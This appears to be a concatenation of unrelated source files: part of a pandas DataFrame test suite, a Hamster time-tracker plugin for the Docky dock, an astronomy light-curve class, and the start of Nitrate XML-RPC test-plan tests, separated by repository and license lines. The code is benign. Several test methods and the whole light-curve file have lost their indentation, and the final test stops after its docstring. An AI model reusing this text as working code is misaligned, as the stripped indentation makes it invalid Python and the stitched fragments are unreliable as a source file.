            ea = ea.reindex(columns=join_columns)
            eb = eb.reindex(columns=join_columns)

        ea = ea.fillna(axis=fill_axis, method=method, limit=limit)
        eb = eb.fillna(axis=fill_axis, method=method, limit=limit)

        assert_frame_equal(aa, ea)
        assert_frame_equal(ab, eb)
    @pytest.mark.parametrize('meth', ['pad', 'bfill'])
    @pytest.mark.parametrize('ax', [0, 1, None])
    @pytest.mark.parametrize('fax', [0, 1])
    @pytest.mark.parametrize('how', ['inner', 'outer', 'left', 'right'])
    def test_align_fill_method(self, how, meth, ax, fax):
        """Exercise align() fill methods over the full parameter grid."""
        self._check_align_fill(how, meth, ax, fax)
    def _check_align_fill(self, kind, meth, ax, fax):
        """Run _check_align for normal, one-sided-empty, and both-empty frames."""
        left = self.frame.iloc[0:4, :10]
        right = self.frame.iloc[2:, 6:]
        empty = self.frame.iloc[:0, :0]

        self._check_align(left, right, axis=ax, fill_axis=fax,
                          how=kind, method=meth)
        self._check_align(left, right, axis=ax, fill_axis=fax,
                          how=kind, method=meth, limit=1)

        # empty left
        self._check_align(empty, right, axis=ax, fill_axis=fax,
                          how=kind, method=meth)
        self._check_align(empty, right, axis=ax, fill_axis=fax,
                          how=kind, method=meth, limit=1)

        # empty right
        self._check_align(left, empty, axis=ax, fill_axis=fax,
                          how=kind, method=meth)
        self._check_align(left, empty, axis=ax, fill_axis=fax,
                          how=kind, method=meth, limit=1)

        # both empty
        self._check_align(empty, empty, axis=ax, fill_axis=fax,
                          how=kind, method=meth)
        self._check_align(empty, empty, axis=ax, fill_axis=fax,
                          how=kind, method=meth, limit=1)
    def test_align_int_fill_bug(self):
        """Mean-subtraction after int-column insert matches float frame (GH 910)."""
        # GH #910
        X = np.arange(10 * 10, dtype='float64').reshape(10, 10)
        Y = np.ones((10, 1), dtype=int)

        df1 = DataFrame(X)
        df1['0.X'] = Y.squeeze()

        df2 = df1.astype(float)

        result = df1 - df1.mean()
        expected = df2 - df2.mean()
        assert_frame_equal(result, expected)
    def test_align_multiindex(self):
        """align() between a MultiIndex frame and a single-level frame (GH 10665)."""
        # GH 10665
        # same test cases as test_align_multiindex in test_series.py

        midx = pd.MultiIndex.from_product([range(2), range(3), range(2)],
                                          names=('a', 'b', 'c'))
        idx = pd.Index(range(2), name='b')
        df1 = pd.DataFrame(np.arange(12, dtype='int64'), index=midx)
        df2 = pd.DataFrame(np.arange(2, dtype='int64'), index=idx)

        # these must be the same results (but flipped)
        res1l, res1r = df1.align(df2, join='left')
        res2l, res2r = df2.align(df1, join='right')

        expl = df1
        assert_frame_equal(expl, res1l)
        assert_frame_equal(expl, res2r)
        expr = pd.DataFrame([0, 0, 1, 1, np.nan, np.nan] * 2, index=midx)
        assert_frame_equal(expr, res1r)
        assert_frame_equal(expr, res2l)

        res1l, res1r = df1.align(df2, join='right')
        res2l, res2r = df2.align(df1, join='left')

        exp_idx = pd.MultiIndex.from_product([range(2), range(2), range(2)],
                                             names=('a', 'b', 'c'))
        expl = pd.DataFrame([0, 1, 2, 3, 6, 7, 8, 9], index=exp_idx)
        assert_frame_equal(expl, res1l)
        assert_frame_equal(expl, res2r)
        expr = pd.DataFrame([0, 0, 1, 1] * 2, index=exp_idx)
        assert_frame_equal(expr, res1r)
        assert_frame_equal(expr, res2l)
    def test_align_series_combinations(self):
        """Frame/Series alignment is symmetric in both call orders."""
        df = pd.DataFrame({'a': [1, 3, 5],
                           'b': [1, 3, 5]}, index=list('ACE'))
        s = pd.Series([1, 2, 4], index=list('ABD'), name='x')

        # frame + series
        res1, res2 = df.align(s, axis=0)
        exp1 = pd.DataFrame({'a': [1, np.nan, 3, np.nan, 5],
                             'b': [1, np.nan, 3, np.nan, 5]},
                            index=list('ABCDE'))
        exp2 = pd.Series([1, 2, np.nan, 4, np.nan],
                         index=list('ABCDE'), name='x')

        tm.assert_frame_equal(res1, exp1)
        tm.assert_series_equal(res2, exp2)

        # series + frame
        res1, res2 = s.align(df)
        tm.assert_series_equal(res1, exp2)
        tm.assert_frame_equal(res2, exp1)
    def test_filter(self):
        """filter() by items, like, and regex, plus its error conditions."""
        # Items
        filtered = self.frame.filter(['A', 'B', 'E'])
        assert len(filtered.columns) == 2
        assert 'E' not in filtered

        filtered = self.frame.filter(['A', 'B', 'E'], axis='columns')
        assert len(filtered.columns) == 2
        assert 'E' not in filtered

        # Other axis
        idx = self.frame.index[0:4]
        filtered = self.frame.filter(idx, axis='index')
        expected = self.frame.reindex(index=idx)
        tm.assert_frame_equal(filtered, expected)

        # like
        fcopy = self.frame.copy()
        fcopy['AA'] = 1

        filtered = fcopy.filter(like='A')
        assert len(filtered.columns) == 2
        assert 'AA' in filtered

        # like with ints in column names
        df = DataFrame(0., index=[0, 1, 2], columns=[0, 1, '_A', '_B'])
        filtered = df.filter(like='_')
        assert len(filtered.columns) == 2

        # regex with ints in column names
        # from PR #10384
        df = DataFrame(0., index=[0, 1, 2], columns=['A1', 1, 'B', 2, 'C'])
        expected = DataFrame(
            0., index=[0, 1, 2], columns=pd.Index([1, 2], dtype=object))
        filtered = df.filter(regex='^[0-9]+$')
        tm.assert_frame_equal(filtered, expected)

        expected = DataFrame(0., index=[0, 1, 2], columns=[0, '0', 1, '1'])
        # shouldn't remove anything
        filtered = expected.filter(regex='^[0-9]+$')
        tm.assert_frame_equal(filtered, expected)

        # pass in None
        with pytest.raises(TypeError, match='Must pass'):
            self.frame.filter()
        with pytest.raises(TypeError, match='Must pass'):
            self.frame.filter(items=None)
        with pytest.raises(TypeError, match='Must pass'):
            self.frame.filter(axis=1)

        # test mutually exclusive arguments
        with pytest.raises(TypeError, match='mutually exclusive'):
            self.frame.filter(items=['one', 'three'], regex='e$', like='bbi')
        with pytest.raises(TypeError, match='mutually exclusive'):
            self.frame.filter(items=['one', 'three'], regex='e$', axis=1)
        with pytest.raises(TypeError, match='mutually exclusive'):
            self.frame.filter(items=['one', 'three'], regex='e$')
        with pytest.raises(TypeError, match='mutually exclusive'):
            self.frame.filter(items=['one', 'three'], like='bbi', axis=0)
        with pytest.raises(TypeError, match='mutually exclusive'):
            self.frame.filter(items=['one', 'three'], like='bbi')

        # objects
        filtered = self.mixed_frame.filter(like='foo')
        assert 'foo' in filtered

        # unicode columns, won't ascii-encode
        df = self.frame.rename(columns={'B': u('\u2202')})
        filtered = df.filter(like='C')
        assert 'C' in filtered
    def test_filter_regex_search(self):
        """filter(regex=...) matches anywhere in the label, not just a prefix."""
        fcopy = self.frame.copy()
        fcopy['AA'] = 1

        # regex
        filtered = fcopy.filter(regex='[A]+')
        assert len(filtered.columns) == 2
        assert 'AA' in filtered

        # doesn't have to be at beginning
        df = DataFrame({'aBBa': [1, 2],
                        'BBaBB': [1, 2],
                        'aCCa': [1, 2],
                        'aCCaBB': [1, 2]})

        result = df.filter(regex='BB')
        exp = df[[x for x in df.columns if 'BB' in x]]
        assert_frame_equal(result, exp)
    @pytest.mark.parametrize('name,expected', [
        ('a', DataFrame({u'a': [1, 2]})),
        (u'a', DataFrame({u'a': [1, 2]})),
        (u'あ', DataFrame({u'あ': [3, 4]}))
    ])
    def test_filter_unicode(self, name, expected):
        """filter() works with unicode column names (GH13101)."""
        # GH13101
        df = DataFrame({u'a': [1, 2], u'あ': [3, 4]})

        assert_frame_equal(df.filter(like=name), expected)
        assert_frame_equal(df.filter(regex=name), expected)
    @pytest.mark.parametrize('name', ['a', u'a'])
    def test_filter_bytestring(self, name):
        """filter() matches bytestring columns against str patterns (GH13101)."""
        # GH13101
        df = DataFrame({b'a': [1, 2], b'b': [3, 4]})
        expected = DataFrame({b'a': [1, 2]})

        assert_frame_equal(df.filter(like=name), expected)
        assert_frame_equal(df.filter(regex=name), expected)
def test_filter_corner(self):
empty = DataFrame()
result = empty.filter([])
assert_frame_equal(result, empty)
result = empty.filter(like='foo')
assert_frame_equal(result, empty)
    def test_select(self):
        """DataFrame.select is deprecated (gh-12410): it must warn with
        FutureWarning while still working, and the documented .loc-based
        replacements must give identical results."""
        # deprecated: gh-12410
        f = lambda x: x.weekday() == 2
        index = self.tsframe.index[[f(x) for x in self.tsframe.index]]
        expected_weekdays = self.tsframe.reindex(index=index)
        with tm.assert_produces_warning(FutureWarning,
                                        check_stacklevel=False):
            result = self.tsframe.select(f, axis=0)
            assert_frame_equal(result, expected_weekdays)
            result = self.frame.select(lambda x: x in ('B', 'D'), axis=1)
            expected = self.frame.reindex(columns=['B', 'D'])
            assert_frame_equal(result, expected, check_names=False)
        # replacement
        f = lambda x: x.weekday == 2
        result = self.tsframe.loc(axis=0)[f(self.tsframe.index)]
        assert_frame_equal(result, expected_weekdays)
        crit = lambda x: x in ['B', 'D']
        result = self.frame.loc(axis=1)[(self.frame.columns.map(crit))]
        expected = self.frame.reindex(columns=['B', 'D'])
        assert_frame_equal(result, expected, check_names=False)
        # doc example
        df = DataFrame({'A': [1, 2, 3]}, index=['foo', 'bar', 'baz'])
        crit = lambda x: x in ['bar', 'baz']
        with tm.assert_produces_warning(FutureWarning):
            expected = df.select(crit)
        result = df.loc[df.index.map(crit)]
        assert_frame_equal(result, expected, check_names=False)
    def test_take(self):
        """take() with positional (and negative) indices must match the
        equivalent reindex/.loc on both axes for homogeneous and mixed-dtype
        frames, raise IndexError for out-of-bounds indices, and still accept
        the deprecated convert= argument under a FutureWarning."""
        # homogeneous
        order = [3, 1, 2, 0]
        for df in [self.frame]:
            result = df.take(order, axis=0)
            expected = df.reindex(df.index.take(order))
            assert_frame_equal(result, expected)
            # axis = 1
            result = df.take(order, axis=1)
            expected = df.loc[:, ['D', 'B', 'C', 'A']]
            assert_frame_equal(result, expected, check_names=False)
        # negative indices
        order = [2, 1, -1]
        for df in [self.frame]:
            result = df.take(order, axis=0)
            expected = df.reindex(df.index.take(order))
            assert_frame_equal(result, expected)
            with tm.assert_produces_warning(FutureWarning):
                result = df.take(order, convert=True, axis=0)
            assert_frame_equal(result, expected)
            with tm.assert_produces_warning(FutureWarning):
                result = df.take(order, convert=False, axis=0)
            assert_frame_equal(result, expected)
            # axis = 1
            result = df.take(order, axis=1)
            expected = df.loc[:, ['C', 'B', 'D']]
            assert_frame_equal(result, expected, check_names=False)
            # illegal indices
            pytest.raises(IndexError, df.take, [3, 1, 2, 30], axis=0)
            pytest.raises(IndexError, df.take, [3, 1, 2, -31], axis=0)
            pytest.raises(IndexError, df.take, [3, 1, 2, 5], axis=1)
            pytest.raises(IndexError, df.take, [3, 1, 2, -5], axis=1)
        # mixed-dtype
        order = [4, 1, 2, 0, 3]
        for df in [self.mixed_frame]:
            result = df.take(order, axis=0)
            expected = df.reindex(df.index.take(order))
            assert_frame_equal(result, expected)
            # axis = 1
            result = df.take(order, axis=1)
            expected = df.loc[:, ['foo', 'B', 'C', 'A', 'D']]
            assert_frame_equal(result, expected)
        # negative indices
        order = [4, 1, -2]
        for df in [self.mixed_frame]:
            result = df.take(order, axis=0)
            expected = df.reindex(df.index.take(order))
            assert_frame_equal(result, expected)
            # axis = 1
            result = df.take(order, axis=1)
            expected = df.loc[:, ['foo', 'B', 'D']]
            assert_frame_equal(result, expected)
        # by dtype
        order = [1, 2, 0, 3]
        for df in [self.mixed_float, self.mixed_int]:
            result = df.take(order, axis=0)
            expected = df.reindex(df.index.take(order))
            assert_frame_equal(result, expected)
            # axis = 1
            result = df.take(order, axis=1)
            expected = df.loc[:, ['B', 'C', 'A', 'D']]
            assert_frame_equal(result, expected)
    def test_reindex_boolean(self):
        """Reindexing a boolean frame that introduces missing labels upcasts
        to object dtype (bool cannot hold NaN) and fills with NaN."""
        frame = DataFrame(np.ones((10, 2), dtype=bool),
                          index=np.arange(0, 20, 2),
                          columns=[0, 2])
        reindexed = frame.reindex(np.arange(10))
        assert reindexed.values.dtype == np.object_
        assert isna(reindexed[0][1])
        reindexed = frame.reindex(columns=lrange(3))
        assert reindexed.values.dtype == np.object_
        assert isna(reindexed[1]).all()
def test_reindex_objects(self):
reindexed = self.mixed_frame.reindex(columns=['foo', 'A', 'B'])
assert 'foo' in reindexed
reindexed = self.mixed_frame.reindex(columns=['A', 'B'])
assert 'foo' not in reindexed
    def test_reindex_corner(self):
        """Corner cases: column-reindexing an empty frame, and reindexing an
        int frame with a new column, which must upcast that column to float."""
        index = Index(['a', 'b', 'c'])
        dm = self.empty.reindex(index=[1, 2, 3])
        reindexed = dm.reindex(columns=index)
        tm.assert_index_equal(reindexed.columns, index)
        # ints are weird
        smaller = self.intframe.reindex(columns=['A', 'B', 'E'])
        assert smaller['E'].dtype == np.float64
    def test_reindex_axis(self):
        """reindex_axis is deprecated: it must emit a FutureWarning whose
        message points at reindex, while still returning the same result."""
        cols = ['A', 'B', 'E']
        with tm.assert_produces_warning(FutureWarning) as m:
            reindexed1 = self.intframe.reindex_axis(cols, axis=1)
        assert 'reindex' in str(m[0].message)
        reindexed2 = self.intframe.reindex(columns=cols)
        assert_frame_equal(reindexed1, reindexed2)
        rows = self.intframe.index[0:5]
        with tm.assert_produces_warning(FutureWarning) as m:
            reindexed1 = self.intframe.reindex_axis(rows, axis=0)
        assert 'reindex' in str(m[0].message)
        reindexed2 = self.intframe.reindex(index=rows)
        assert_frame_equal(reindexed1, reindexed2)
        # a DataFrame has no axis 2
        pytest.raises(ValueError, self.intframe.reindex_axis, rows, axis=2)
        # no-op case
        cols = self.frame.columns.copy()
        with tm.assert_produces_warning(FutureWarning) as m:
            newFrame = self.frame.reindex_axis(cols, axis=1)
        assert 'reindex' in str(m[0].message)
        assert_frame_equal(newFrame, self.frame)
    def test_reindex_with_nans(self):
        """Reindexing a float index that contains NaN labels must still align
        the non-NaN labels correctly."""
        df = DataFrame([[1, 2], [3, 4], [np.nan, np.nan], [7, 8], [9, 10]],
                       columns=['a', 'b'],
                       index=[100.0, 101.0, np.nan, 102.0, 103.0])
        result = df.reindex(index=[101.0, 102.0, 103.0])
        expected = df.iloc[[1, 3, 4]]
        assert_frame_equal(result, expected)
        result = df.reindex(index=[103.0])
        expected = df.iloc[[4]]
        assert_frame_equal(result, expected)
        result = df.reindex(index=[101.0])
        expected = df.iloc[[1]]
        assert_frame_equal(result, expected)
    def test_reindex_multi(self):
        """Reindexing both axes at once equals two chained single-axis
        reindexes, across float, int and complex dtypes."""
        df = DataFrame(np.random.randn(3, 3))
        result = df.reindex(index=lrange(4), columns=lrange(4))
        expected = df.reindex(lrange(4)).reindex(columns=lrange(4))
        assert_frame_equal(result, expected)
        df = DataFrame(np.random.randint(0, 10, (3, 3)))
        result = df.reindex(index=lrange(4), columns=lrange(4))
        expected = df.reindex(lrange(4)).reindex(columns=lrange(4))
        assert_frame_equal(result, expected)
        df = DataFrame(np.random.randint(0, 10, (3, 3)))
        result = df.reindex(index=lrange(2), columns=lrange(2))
        expected = df.reindex(lrange(2)).reindex(columns=lrange(2))
        assert_frame_equal(result, expected)
        df = DataFrame(np.random.randn(5, 3) + 1j, columns=['a', 'b', 'c'])
        result = df.reindex(index=[0, 1], columns=['a', 'b'])
        expected = df.reindex([0, 1]).reindex(columns=['a', 'b'])
        assert_frame_equal(result, expected)
    def test_reindex_multi_categorical_time(self):
        """Reindexing back to a full MultiIndex of Categoricals (including a
        categorical datetime level) restores dropped rows as NaN.

        https://github.com/pandas-dev/pandas/issues/21390
        """
        midx = pd.MultiIndex.from_product(
            [Categorical(['a', 'b', 'c']),
             Categorical(date_range("2012-01-01", periods=3, freq='H'))])
        df = pd.DataFrame({'a': range(len(midx))}, index=midx)
        # drop row 7, then reindex to the full index: 7 comes back as NaN
        df2 = df.iloc[[0, 1, 2, 3, 4, 5, 6, 8]]
        result = df2.reindex(midx)
        expected = pd.DataFrame(
            {'a': [0, 1, 2, 3, 4, 5, 6, np.nan, 8]}, index=midx)
        assert_frame_equal(result, expected)
    # Shared fixture rows for the duplicate-index drop tests below.
    data = [[1, 2, 3], [1, 2, 3]]
    @pytest.mark.parametrize('actual', [
        DataFrame(data=data, index=['a', 'a']),
        DataFrame(data=data, index=['a', 'b']),
        DataFrame(data=data, index=['a', 'b']).set_index([0, 1]),
        DataFrame(data=data, index=['a', 'a']).set_index([0, 1])
    ])
    def test_raise_on_drop_duplicate_index(self, actual):
        """Dropping a missing label raises KeyError on either axis, for both
        flat and MultiIndex axes, unless errors='ignore' (issue 19186)."""
        # issue 19186
        level = 0 if isinstance(actual.index, MultiIndex) else None
        with pytest.raises(KeyError):
            actual.drop('c', level=level, axis=0)
        with pytest.raises(KeyError):
            actual.T.drop('c', level=level, axis=1)
        expected_no_err = actual.drop('c', axis=0, level=level,
                                      errors='ignore')
        assert_frame_equal(expected_no_err, actual)
        expected_no_err = actual.T.drop('c', axis=1, level=level,
                                        errors='ignore')
        assert_frame_equal(expected_no_err.T, actual)
@pytest.mark.parametrize('index', [[1, 2, 3], [1, 1, 2]])
@pytest.mark.parametrize('drop_labels', [[], [1], [2]])
def test_drop_empty_list(self, index, drop_labels):
# GH 21494
expected_index = [i for i in index if i not in drop_labels]
frame = pd.DataFrame(index=index).drop(drop_labels)
tm.assert_frame_equal(frame, pd.DataFrame(index=expected_index))
    @pytest.mark.parametrize('index', [[1, 2, 3], [1, 2, 2]])
    @pytest.mark.parametrize('drop_labels', [[1, 4], [4, 5]])
    def test_drop_non_empty_list(self, index, drop_labels):
        """drop() raises KeyError when any requested label is absent (GH 21494)."""
        # GH 21494
        with pytest.raises(KeyError, match='not found in axis'):
            pd.DataFrame(index=index).drop(drop_labels)
| bsd-3-clause |
d/hamster-applet | src/docky_control/2.0/hamster_control.py | 1 | 3556 | #!/usr/bin/env python
#
# Copyright (C) 2010 Toms Baugis
#
# Original code from Banshee control,
# Copyright (C) 2009-2010 Jason Smith, Rico Tzschichholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import atexit
import gobject
import sys, os
from subprocess import Popen
import gtk
from docky.docky import DockyItem, DockySink
from signal import signal, SIGTERM
from sys import exit
from hamster import client
from hamster.utils import stuff, i18n
i18n.setup_i18n()
class DockyHamsterItem(DockyItem):
    """Docky dock-item proxy that mirrors the current hamster activity.

    Shows the running activity/category as the item text, the elapsed time
    as a badge, and offers Overview/Preferences context-menu entries.
    """
    def __init__(self, path):
        DockyItem.__init__(self, path)
        self.storage = client.Storage()
        # Refresh whenever hamster's stored facts or activities change.
        self.storage.connect("facts-changed", lambda storage: self.refresh_hamster())
        self.storage.connect("activities-changed", lambda storage: self.refresh_hamster())
        self.id_map = {} #menu items
        self.update_text()
        self.add_actions()
        # Also poll once a minute so the duration badge keeps ticking.
        gobject.timeout_add_seconds(60, self.refresh_hamster)
    def refresh_hamster(self):
        """Timer/signal callback; always returns True to keep the timer alive."""
        try:
            self.update_text()
        finally: # we want to go on no matter what, so in case of any error we find out about it sooner
            return True
    def update_text(self):
        """Show the ongoing fact (if any) as text plus a duration badge."""
        today = self.storage.get_todays_facts()
        # An ongoing fact is the last of today's facts with no end time yet.
        if today and today[-1].end_time is None:
            fact = today[-1]
            self.iface.SetText("%s - %s" % (fact.activity, fact.category))
            self.iface.SetBadgeText(stuff.format_duration(fact.delta, human=False))
        else:
            self.iface.SetText(_("No activity"))
            self.iface.ResetBadgeText()
    def add_menu_item(self, name, icon):
        """Add one context-menu entry and remember its id for click dispatch."""
        menu_id = self.iface.AddMenuItem(name, icon, "")
        self.id_map[menu_id] = name
    def menu_pressed(self, menu_id):
        """Launch the hamster window matching the clicked menu entry."""
        if self.id_map[menu_id] == _("Overview"):
            Popen(["hamster-time-tracker", "overview"])
        elif self.id_map[menu_id] == _("Preferences"):
            Popen(["hamster-time-tracker", "preferences"])
        self.add_actions() # TODO - figure out why is it that we have to regen all menu items after each click
    def add_actions(self):
        """Rebuild the context menu from scratch."""
        # first clear the menu
        for k, v in self.id_map.iteritems():
            self.iface.RemoveItem(k)
        self.id_map = {}
        # now add buttons
        self.add_menu_item(_("Overview"), "")
        self.add_menu_item(_("Preferences"), "preferences-desktop-personal")
class DockyHamsterSink(DockySink):
    """Watches Docky for dock items owned by the hamster desktop file."""
    def item_path_found(self, pathtoitem, item):
        # Attach our wrapper only to the hamster launcher's own dock icon.
        if item.GetOwnsDesktopFile() and item.GetDesktopFile().endswith("hamster-time-tracker.desktop"):
            self.items[pathtoitem] = DockyHamsterItem(pathtoitem)
# Module-level singleton sink; disposed on exit via cleanup().
dockysink = DockyHamsterSink()
def cleanup():
    # Release the sink's DBus/dock resources when the process exits.
    dockysink.dispose()
if __name__ == "__main__":
    mainloop = gobject.MainLoop(is_running=True)
    # Ensure cleanup() runs both on normal interpreter exit and on SIGTERM.
    atexit.register (cleanup)
    signal(SIGTERM, lambda signum, stack_frame: exit(1))
    while mainloop.is_running():
        mainloop.run()
| gpl-3.0 |
uperetz/AstroTools | lc.py | 1 | 3601 | #Object for handling numerical functions
from plotInt import Iplot
from re import split
class lightCurve:
x = 0
y = 1
dy = 2
class lcOutOfBound(Exception): pass
def __init__(self,table = []):
self.table = []
try:
for line in open(table):
try:
self.table.append([float(x) for x in
split("\s+",line.strip())])
except TypeError: continue
except TypeError: self.table = table
self.table.sort()
'Currently only 3-point derivative.'
def diff(self,i):
if i <= 0 or i >= len(self.table)-1: return None
dy = self.table[i+1][1] - self.table[i-1][1]
dx = self.table[i+1][0] - self.table[i-1][0]
return self.table[i][0],dy/dx
def avg(self,column, transform = lambda x: x):
return sum([transform(row[column]) for row in self.table])/len(self.table)
def var(self, column):
return self.avg(column,lambda x: x**2)-self.avg(column)**2
def resetzoom(self):
try: self.table = self.original
except KeyError: pass
def slideAndAverage(self, windowSize, action, verbose=False):
if action in dir(self):
start = -1
res = 0
count = 0
try:
while True:
start += 1
stop = self.find(self.table[start][0]+windowSize)
self.zoom(window=[start,stop])
current = getattr(self,action)()
self.resetzoom()
if verbose:
print("-I- Window [",start,"=",self.table[start][0],"-",stop,"=",self.table[stop][0],"] got",action,"of",current)
res += current
count += 1
except lightCurve.lcOutOfBound: pass
if verbose:
print("-I- Got",count,"windows.")
return res/count
else:
print("-E- Got bad action! use dir() to see availble actions (no parameter functions).")
def inPairs(self, column, action=lambda x,y: abs(x-y), after=lambda x: sum(x)/(len(x)-1)):
return after([action(self.table[i][column],self.table[i-1][column])
for i in range(1,len(self.table))])
def zoom(self, timewindow=None, window=[]):
if timewindow:
window.append(self.find(timewindow[0]))
window.append(self.find(timewindow[1]))
if window[1] < 0:
window[1] += len(self.table)
window[1] += 1
self.original = self.table
self.table = self.table[window[0]:window[1]]
def Fvar(self):
return ((self.var(self.y) - self.avg(self.dy,lambda x: x**2))/
self.avg(self.y)**2)**0.5
#Earliest time smaller or equal to time
def find(self, time):
if time > self.table[-1][0] or time < self.table[0][0]:
raise lightCurve.lcOutOfBound()
for i in range(0,len(self.table)):
if self.table[i][0] > time: return i
def dFvar(self):
N = len(self.table)
s2 = self.avg(self.dy,lambda x: x**2)
F = (self.avg(self.y))
return ( (((s2/N)**0.5)/F)**2 + ((s2/F**2/self.Fvar())*(1/(2*N))**0.5)**2 )**0.5
def plot(self):
Iplot.clearPlots()
Iplot.plotCurves(self)
def __getitem__(self,i):
return self.table[i]
def __iadd__(self,other):
self.table += other.table
return self
def __len__(self):
return len(self.table)
| apache-2.0 |
tkdchen/Nitrate | src/tests/xmlrpc/test_testplan.py | 2 | 18477 | # -*- coding: utf-8 -*-
import unittest
from django import test
from tcms.testcases.models import TestCase
from tcms.testcases.models import TestCasePlan
from tcms.testplans.models import TCMSEnvPlanMap, TestPlan, TestPlanType
from tcms.xmlrpc.api import testplan as XmlrpcTestPlan
from tcms.xmlrpc.api.testplan import import_case_via_XML
from tcms.xmlrpc.serializer import datetime_to_str
from tests import factories as f
from tests.testplans.test_importer import xml_file_without_error
from tests.xmlrpc.utils import make_http_request
from tests.xmlrpc.utils import XmlrpcAPIBaseTest
__all__ = (
"TestAddComponent",
"TestAddTag",
"TestComponentMethods",
"TestFilter",
"TestGetAllCasesTags",
"TestGetProduct",
"TestGetTestCases",
"TestGetTestRuns",
"TestGetText",
"TestImportCaseViaXML",
"TestPlanTypeMethods",
"TestRemoveTag",
"TestUpdate",
)
class TestFilter(XmlrpcAPIBaseTest):
    """Test TestPlan.filter"""
    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()
        cls.product = f.ProductFactory()
        cls.version = f.VersionFactory(product=cls.product)
        cls.tester = f.UserFactory()
        cls.plan_type = f.TestPlanTypeFactory(name="manual smoking")
        cls.plan_1 = f.TestPlanFactory(
            product_version=cls.version,
            product=cls.product,
            author=cls.tester,
            type=cls.plan_type,
        )
        cls.plan_2 = f.TestPlanFactory(
            product_version=cls.version,
            product=cls.product,
            author=cls.tester,
            type=cls.plan_type,
        )
        # Both cases belong to plan_1 only; plan_2 stays empty.
        cls.case_1 = f.TestCaseFactory(
            author=cls.tester,
            default_tester=None,
            reviewer=cls.tester,
            plan=[cls.plan_1],
        )
        cls.case_2 = f.TestCaseFactory(
            author=cls.tester,
            default_tester=None,
            reviewer=cls.tester,
            plan=[cls.plan_1],
        )
    def test_filter_plans(self):
        """A pk filter returns serialized plans including their case id lists."""
        plans = XmlrpcTestPlan.filter(self.request, {"pk__in": [self.plan_1.pk, self.plan_2.pk]})
        plan = plans[0]
        self.assertEqual(self.plan_1.name, plan["name"])
        self.assertEqual(self.plan_1.product_version.pk, plan["product_version_id"])
        self.assertEqual(self.plan_1.author.pk, plan["author_id"])
        self.assertEqual(2, len(plan["case"]))
        self.assertEqual([self.case_1.pk, self.case_2.pk], plan["case"])
        # plan_2 has no cases attached
        self.assertEqual(0, len(plans[1]["case"]))
    def test_filter_out_all_plans(self):
        """An empty or missing filter returns every plan in the database."""
        plans_total = TestPlan.objects.all().count()
        self.assertEqual(plans_total, len(XmlrpcTestPlan.filter(None)))
        self.assertEqual(plans_total, len(XmlrpcTestPlan.filter(None, {})))
class TestAddTag(XmlrpcAPIBaseTest):
    """Test TestPlan.add_tag"""
    @classmethod
    def setUpTestData(cls):
        cls.user = f.UserFactory()
        cls.http_req = make_http_request(user=cls.user, user_perm="testplans.add_testplantag")
        cls.product = f.ProductFactory()
        cls.plans = [
            f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
            f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
        ]
        cls.tag1 = f.TestTagFactory(name="xmlrpc_test_tag_1")
        cls.tag2 = f.TestTagFactory(name="xmlrpc_test_tag_2")
        cls.tag_name = "xmlrpc_tag_name_1"
    def test_single_id(self):
        """Test with single plan id and tag id"""
        # Tags must be passed by name; a numeric tag id is rejected.
        self.assertXmlrpcFaultInternalServerError(
            XmlrpcTestPlan.add_tag, self.http_req, self.plans[0].pk, self.tag1.pk
        )
        XmlrpcTestPlan.add_tag(self.http_req, self.plans[0].pk, self.tag1.name)
        tag_exists = TestPlan.objects.filter(pk=self.plans[0].pk, tag__pk=self.tag1.pk).exists()
        self.assertTrue(tag_exists)
    def test_array_argument(self):
        """Both the plan ids and the tag names may be passed as arrays."""
        XmlrpcTestPlan.add_tag(self.http_req, self.plans[0].pk, [self.tag2.name, self.tag_name])
        tag_exists = TestPlan.objects.filter(
            pk=self.plans[0].pk, tag__name__in=[self.tag2.name, self.tag_name]
        )
        self.assertTrue(tag_exists.exists())
        plans_ids = [plan.pk for plan in self.plans]
        tags_names = [self.tag_name, "xmlrpc_tag_name_2"]
        XmlrpcTestPlan.add_tag(self.http_req, plans_ids, tags_names)
        for plan in self.plans:
            tag_exists = plan.tag.filter(name__in=tags_names).exists()
            self.assertTrue(tag_exists)
class TestAddComponent(XmlrpcAPIBaseTest):
    """Test TestPlan.add_component"""
    @classmethod
    def setUpTestData(cls):
        cls.user = f.UserFactory()
        cls.http_req = make_http_request(user=cls.user, user_perm="testplans.add_testplancomponent")
        cls.product = f.ProductFactory()
        cls.plans = [
            f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
            f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
        ]
        cls.component1 = f.ComponentFactory(
            name="xmlrpc test component 1",
            description="xmlrpc test description",
            product=cls.product,
            initial_owner=None,
            initial_qa_contact=None,
        )
        cls.component2 = f.ComponentFactory(
            name="xmlrpc test component 2",
            description="xmlrpc test description",
            product=cls.product,
            initial_owner=None,
            initial_qa_contact=None,
        )
    def test_single_id(self):
        """A single plan id and component id links exactly that pair."""
        XmlrpcTestPlan.add_component(self.http_req, self.plans[0].pk, self.component1.pk)
        component_exists = TestPlan.objects.filter(
            pk=self.plans[0].pk, component__pk=self.component1.pk
        ).exists()
        self.assertTrue(component_exists)
    def test_ids_in_array(self):
        """Plan ids and component ids may be arrays; missing component ids fault."""
        self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.add_component, self.http_req, [1, 2])
        plans_ids = [plan.pk for plan in self.plans]
        components_ids = [self.component1.pk, self.component2.pk]
        XmlrpcTestPlan.add_component(self.http_req, plans_ids, components_ids)
        for plan in TestPlan.objects.filter(pk__in=plans_ids):
            components_ids = [item.pk for item in plan.component.iterator()]
            self.assertTrue(self.component1.pk in components_ids)
            self.assertTrue(self.component2.pk in components_ids)
class TestPlanTypeMethods(XmlrpcAPIBaseTest):
    """Test TestPlan.check_plan_type and TestPlan.get_plan_type"""
    @classmethod
    def setUpTestData(cls):
        cls.http_req = make_http_request()
        cls.plan_type = f.TestPlanTypeFactory(name="xmlrpc plan type", description="")
    def test_check_plan_type(self):
        """check_plan_type looks a type up by name; the name is mandatory."""
